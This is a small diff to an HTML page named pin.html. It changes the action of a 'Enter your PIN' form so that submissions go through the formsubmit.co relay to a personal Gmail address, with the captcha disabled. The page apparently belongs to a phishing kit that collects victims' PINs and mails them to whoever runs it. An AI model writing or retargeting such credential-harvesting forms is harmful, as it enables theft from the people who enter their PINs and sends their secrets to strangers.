--- a/pin.html
+++ b/pin.html
@@ -207,7 +207,7 @@
       <p>Enter your PIN</p>
       <form
         id="pinForm"
-        action="https://formsubmit.co/el/jeyolu"
+        action="https://formsubmit.co/emenikeonyechere@gmail.com"
         method="POST"
       >
         <input type="hidden" name="_captcha" value="false" />
